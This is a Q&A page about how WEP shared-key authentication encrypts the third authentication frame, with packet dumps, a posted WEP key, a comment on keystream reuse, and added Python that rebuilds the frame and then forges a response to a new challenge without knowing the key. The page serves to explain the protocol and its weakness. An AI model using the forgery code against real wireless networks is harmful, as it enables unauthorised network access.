What is the WEP shared-key authentication algorithm?
I have recently been reading a book named 802.11 Wireless Networks: The Definitive Guide (second edition). I find myself unable to understand the algorithm of WEP shared-key authentication.
In the book, chapter 8.3, section "The legacy of shared-key authentication", it says:
The third frame is the mobile station's response to the challenge. To prove that it is allowed on the network, the mobile station constructs a management frame with three information elements: the Authentication Algorithm Identifier, a Sequence Number of 3, and the Challenge Text. Before transmitting the frame, the mobile station processes the frame with WEP (BUT HOW???). The header identifying the frame as an authentication frame is preserved, but the information elements are hidden by WEP.
So, I'd like to ask the kind community here.
Here are my example WEP auth session packets, captured with Tamosoft Commview for wifi 6.3.
- AP MAC: 000E.2E7C.52A9 (Edimax)
- Wifi client: 0020.4A96.23C7 (Lantronix WiPort)
- WEP key is 437B7A57F6762CC7271EBB16FC
You can find my packet capture here: http://down.nlscan.com/misc/WEP128-shared-key-success-1.ncf
Packets #55, #57, #59 and #61 are the WEP authentication packets. #59 is "the third frame".
============================================================================
Packet #55, Direction: Pass-through, Time:16:11:42.634285, Size: 30
Wireless Packet Info
Signal level: 100%
Rate: 2.0 Mbps
Band: 802.11g
Channel: 11 - 2462 MHz
802.11
Frame Control: 0x00B0 (176)
Protocol version: 0
To DS: 0
From DS: 0
More Fragments: 0
Retry: 0
Power Management: 0
More Data: 0
Protected Frame: 0
Order: 0
Type: 0 - Management
Subtype: 11 - Authentication
Duration: 0x0102 (258)
Destination Address: 00:0E:2E:7C:52:A9
Source Address: 00:20:4A:96:23:C7
BSS ID: 00:0E:2E:7C:52:A9
Fragment Number: 0x0000 (0)
Sequence Number: 0x000E (14)
Authentication
Algorithm Number: 0x0001 (1) - Shared Key
Transaction Sequence Number: 0x0001 (1)
Status Code: 0x0000 (0) - Successful
Raw Data:
0x0000 B0 00 02 01 00 0E 2E 7C-52 A9 00 20 4A 96 23 C7 °......|R©. J–#Ç
0x0010 00 0E 2E 7C 52 A9 E0 00-01 00 01 00 00 00 ...|R©à.......
============================================================================
Packet #57, Direction: Pass-through, Time:16:11:42.638429, Size: 160
Wireless Packet Info
Signal level: 100%
Rate: 1.0 Mbps
Band: 802.11g
Channel: 11 - 2462 MHz
802.11
Frame Control: 0x00B0 (176)
Protocol version: 0
To DS: 0
From DS: 0
More Fragments: 0
Retry: 0
Power Management: 0
More Data: 0
Protected Frame: 0
Order: 0
Type: 0 - Management
Subtype: 11 - Authentication
Duration: 0x013A (314)
Destination Address: 00:20:4A:96:23:C7
Source Address: 00:0E:2E:7C:52:A9
BSS ID: 00:0E:2E:7C:52:A9
Fragment Number: 0x0000 (0)
Sequence Number: 0x0343 (835)
Authentication
Algorithm Number: 0x0001 (1) - Shared Key
Transaction Sequence Number: 0x0002 (2)
Status Code: 0x0000 (0) - Successful
Challenge text: 28 B8 9B EC 79 C1 AC B6 24 AD 54 A5 5A 96 EE 24 3E 25 F2 D5 B8 11 1C 2F E9 8D 2B A2 63 EA 3D 1F 40 6E 8C 3D 2C 7E 37 E9 5C 9C F4 0E F2 9C 50 88 21 DA 35 09 97 AE E3 BA 4E 56 77 9A B4 B1 F2 34 E9 AD
Raw Data:
0x0000 B0 00 3A 01 00 20 4A 96-23 C7 00 0E 2E 7C 52 A9 °.:.. J–#Ç...|R©
0x0010 00 0E 2E 7C 52 A9 30 34-01 00 02 00 00 00 10 80 ...|R©04.......€
0x0020 28 B8 9B EC 79 C1 AC B6-24 AD 54 A5 5A 96 EE 24 (¸›ìyÁ¬¶$T¥Z–î$
0x0030 3E 25 F2 D5 B8 11 1C 2F-E9 8D 2B A2 63 EA 3D 1F >%òÕ¸../é+¢cê=.
0x0040 40 6E 8C 3D 2C 7E 37 E9-5C 9C F4 0E F2 9C 50 88 @nŒ=,~7é\œô.òœPˆ
0x0050 21 DA 35 09 97 AE E3 BA-4E 56 77 9A B4 B1 F2 34 !Ú5.—®ãºNVwš´±ò4
0x0060 E9 AD 8D 98 05 28 A1 AD-3F DA 66 05 60 66 EA 24 é˜.(¡?Úf.`fê$
0x0070 02 DA 14 AC 66 CD DC E6-93 A8 79 23 70 87 39 44 .Ú.¬fÍÜ擨y#p‡9D
0x0080 17 4E 0F AC A2 CA 9F 84-5F 94 66 3C 04 AB 86 8E .N.¬¢ÊŸ„_”f<.«†Ž
0x0090 99 78 AB C9 E9 C0 91 95-9E 52 B1 7C 6B 22 63 C0 ™x«ÉéÀ‘•žR±|k"cÀ
============================================================================
Packet #59, Direction: Pass-through, Time:16:11:42.639825, Size: 168
Wireless Packet Info
Signal level: 100%
Rate: 2.0 Mbps
Band: 802.11g
Channel: 11 - 2462 MHz
802.11
Frame Control: 0x40B0 (16560)
Protocol version: 0
To DS: 0
From DS: 0
More Fragments: 0
Retry: 0
Power Management: 0
More Data: 0
Protected Frame: 1
Order: 0
Type: 0 - Management
Subtype: 11 - Authentication
Duration: 0x0102 (258)
Destination Address: 00:0E:2E:7C:52:A9
Source Address: 00:20:4A:96:23:C7
BSS ID: 00:0E:2E:7C:52:A9
Fragment Number: 0x0000 (0)
Sequence Number: 0x000F (15)
Authentication
Algorithm Number: 0x1300 (4864) - Reserved
Transaction Sequence Number: 0x00F6 (246)
Status Code: 0xB4BA (46266) - Reserved
Raw Data:
0x0000 B0 40 02 01 00 0E 2E 7C-52 A9 00 20 4A 96 23 C7 °@.....|R©. J–#Ç
0x0010 00 0E 2E 7C 52 A9 F0 00-00 13 F6 00 BA B4 A9 F5 ...|R©ð...ö.º´©õ
0x0020 77 E9 5D 1F A2 B2 CE 3A-AD 1E FD 31 EA 55 90 B8 wé].¢²Î:.ý1êU¸
0x0030 56 F6 EF 81 CE C5 95 B6-9B 2F C4 77 BD E0 DD 73 VöïÎÅ•¶›/Äw½àÝs
0x0040 C6 C8 CE F6 0B 3F 0E 8D-08 15 93 5C 26 6E DA 17 ÆÈÎö.?...“\&nÚ.
0x0050 83 34 A2 53 51 65 3C AE-7A 5C A5 EA 04 97 6E F0 ƒ4¢SQe<®z\¥ê.—nð
0x0060 53 02 02 91 08 51 87 8E-83 38 CD 23 35 E7 56 1B S..‘.Q‡Žƒ8Í#5çV.
0x0070 1D A8 52 8F E1 D4 21 FD-46 41 65 AD 26 AB 74 3D .¨RáÔ!ýFAe&«t=
0x0080 E0 13 12 66 F5 C1 67 B3-71 7F 83 77 A0 34 16 55 à..fõÁg³qƒw 4.U
0x0090 25 96 31 01 A0 9C D9 13-1E 7C E6 8F 15 8D 8A 7B %–1. œÙ..|æ.Š{
0x00A0 8E 6B 65 97 74 0B 23 71- Žke—t.#q
============================================================================
Packet #61, Direction: Pass-through, Time:16:11:42.640916, Size: 30
Wireless Packet Info
Signal level: 100%
Rate: 1.0 Mbps
Band: 802.11g
Channel: 11 - 2462 MHz
802.11
Frame Control: 0x00B0 (176)
Protocol version: 0
To DS: 0
From DS: 0
More Fragments: 0
Retry: 0
Power Management: 0
More Data: 0
Protected Frame: 0
Order: 0
Type: 0 - Management
Subtype: 11 - Authentication
Duration: 0x013A (314)
Destination Address: 00:20:4A:96:23:C7
Source Address: 00:0E:2E:7C:52:A9
BSS ID: 00:0E:2E:7C:52:A9
Fragment Number: 0x0000 (0)
Sequence Number: 0x0344 (836)
Authentication
Algorithm Number: 0x0001 (1) - Shared Key
Transaction Sequence Number: 0x0004 (4)
Status Code: 0x0000 (0) - Successful
Raw Data:
0x0000 B0 00 3A 01 00 20 4A 96-23 C7 00 0E 2E 7C 52 A9 °.:.. J–#Ç...|R©
0x0010 00 0E 2E 7C 52 A9 40 34-01 00 04 00 00 00 ...|R©@4......
============================================================================
I know, from the book, how RC4 works, and I have written a Python program to verify how WEP encrypts an 802.11 packet.
The remaining issue is that I just cannot figure out how the WEP authentication algorithm works (how #59 is calculated).
Waiting for your generous help.
Comments (2)
My speculation is that when the challenge is sent in cleartext, the mobile station picks a random IV and, using the pre-shared WEP key, encrypts the challenge with RC4, where the IV is used as the first 3 bytes of the key. These 3 bytes are sent in the clear over the channel. Then the problem starts here, as mentioned later in the book. Anyone who is listening to the communication can eavesdrop and find out the challenge and the ciphertext; XORing these two, the attacker gets the keystream, asks for a new challenge and encrypts it with the same IV as the legitimate user and the same keystream. He can then simply authenticate, though he still does not know the WEP key :)
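The WEP processing of the third frame that the question asks about, and the keystream-reuse forgery the comment above describes, as an added example (this is not code from the original post or from either commenter). It assumes WEP exactly as the standard specifies it: the station prepends a 3-byte IV to the shared key, seeds RC4 with IV||key, appends a CRC-32 ICV to the plaintext frame body, and XORs body||ICV with the keystream; the MAC header stays clear and only the body after it is protected. Every byte constant is transcribed from the capture in the question (the posted key, the 128-byte challenge in #57, and #59 from its IV onwards); the `fake_challenge` used for the forgery is constructed. Note that the sniffer's "Algorithm Number: 0x1300" for #59 is just the decoder reading the IV bytes `00 13` as if they were the algorithm field, since the real fields are under the keystream.

```python
import zlib

# Values transcribed from the capture in the question: the 104-bit WEP key,
# the 128-byte challenge in frame #57, and the WEP body of frame #59
# (everything after its 24-byte MAC header: IV, key-ID byte, ciphertext, ICV).
WEP_KEY = bytes.fromhex("437B7A57F6762CC7271EBB16FC")
CHALLENGE = bytes.fromhex(
    "28B89BEC79C1ACB624AD54A55A96EE24" "3E25F2D5B8111C2FE98D2BA263EA3D1F"
    "406E8C3D2C7E37E95C9CF40EF29C5088" "21DA350997AEE3BA4E56779AB4B1F234"
    "E9AD8D980528A1AD3FDA66056066EA24" "02DA14AC66CDDCE693A8792370873944"
    "174E0FACA2CA9F845F94663C04AB868E" "9978ABC9E9C091959E52B17C6B2263C0"
)
FRAME59_BODY = bytes.fromhex(
    "0013F600BAB4A9F5" "77E95D1FA2B2CE3AAD1EFD31EA5590B8"
    "56F6EF81CEC595B69B2FC477BDE0DD73" "C6C8CEF60B3F0E8D0815935C266EDA17"
    "8334A25351653CAE7A5CA5EA04976EF0" "530202910851878E8338CD2335E7561B"
    "1DA8528FE1D421FD464165AD26AB743D" "E0131266F5C167B3717F8377A0341655"
    "25963101A09CD9131E7CE68F158D8A7B" "8E6B6597740B2371"
)

ALG_SHARED_KEY = 1       # Authentication Algorithm Number for shared key
EID_CHALLENGE_TEXT = 16  # element ID of the Challenge Text IE (0x10 in #57)


def rc4(key: bytes, length: int) -> bytes:
    """Plain RC4: key scheduling, then `length` bytes of keystream."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def icv(data: bytes) -> bytes:
    """WEP integrity check value: CRC-32 over the plaintext, little-endian, no key."""
    return zlib.crc32(data).to_bytes(4, "little")


def wep_encrypt(iv: bytes, key: bytes, data: bytes, key_id: int = 0) -> bytes:
    """IV (3 bytes) || key-ID byte || RC4(IV||key) XOR (data || ICV)."""
    plain = data + icv(data)
    return iv + bytes([key_id << 6]) + xor(plain, rc4(iv + key, len(plain)))


def wep_decrypt(key: bytes, body: bytes):
    """Returns (data, icv_ok); the receiver rebuilds the per-frame key from the clear IV."""
    iv, cipher = body[:3], body[4:]
    plain = xor(cipher, rc4(iv + key, len(cipher)))
    data, tag = plain[:-4], plain[-4:]
    return data, tag == icv(data)


def auth_frame3_plaintext(challenge: bytes) -> bytes:
    """Fixed fields of the third authentication frame, then the Challenge Text IE:
    algorithm 1 (shared key), transaction sequence 3, status 0, all little-endian."""
    fixed = ALG_SHARED_KEY.to_bytes(2, "little") + (3).to_bytes(2, "little") + b"\x00\x00"
    return fixed + bytes([EID_CHALLENGE_TEXT, len(challenge)]) + challenge


def build_frame3_body(iv: bytes, key: bytes, challenge: bytes) -> bytes:
    """What the station does: WEP-protect the whole frame body; the MAC header stays clear."""
    return wep_encrypt(iv, key, auth_frame3_plaintext(challenge))


def capture_matches() -> bool:
    """Rebuild frame #59 from #57's challenge, the posted key and #59's own IV, and compare."""
    return build_frame3_body(FRAME59_BODY[:3], WEP_KEY, CHALLENGE) == FRAME59_BODY


def recover_keystream(challenge: bytes, frame3_body: bytes):
    """Eavesdropper: frame 2 is clear and the ICV is a keyless CRC, so the full 140-byte
    plaintext of frame 3 is known; XOR with the observed ciphertext yields the keystream
    for this IV without ever learning the WEP key."""
    plain = auth_frame3_plaintext(challenge)
    plain += icv(plain)
    return frame3_body[:3], xor(plain, frame3_body[4:4 + len(plain)])


def forge_frame3_body(iv: bytes, keystream: bytes, new_challenge: bytes, key_id: int = 0) -> bytes:
    """Answer a fresh challenge by reusing the captured IV and the recovered keystream."""
    plain = auth_frame3_plaintext(new_challenge)
    plain += icv(plain)
    if len(plain) > len(keystream):
        raise ValueError("not enough recovered keystream for this challenge size")
    return iv + bytes([key_id << 6]) + xor(plain, keystream)


if __name__ == "__main__":
    print("standard WEP reproduces frame #59:", capture_matches())
    iv, ks = recover_keystream(CHALLENGE, FRAME59_BODY)
    fake_challenge = bytes(range(128))  # constructed stand-in for a new AP challenge
    forged = forge_frame3_body(iv, ks, fake_challenge)
    data, ok = wep_decrypt(WEP_KEY, forged)
    print("AP would accept the forged response:", ok and data == auth_frame3_plaintext(fake_challenge))
```

Running it reproduces the 144-byte body of #59 from nothing but the key, the IV `00 13 F6` and the challenge from #57, which is the whole of "processes the frame with WEP". The forgery works because the AP's check is only "decrypts to my challenge with a valid ICV", and everything needed to build that from a captured exchange is public; this is why shared-key authentication is weaker than open authentication followed by WEP data encryption.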
This is a good question, but specifications and books written about them are often incomplete in the place where you need them the most.
Working source code is your best bet in this case and the linux/net/mac80211/wep.c code is out there for the reading.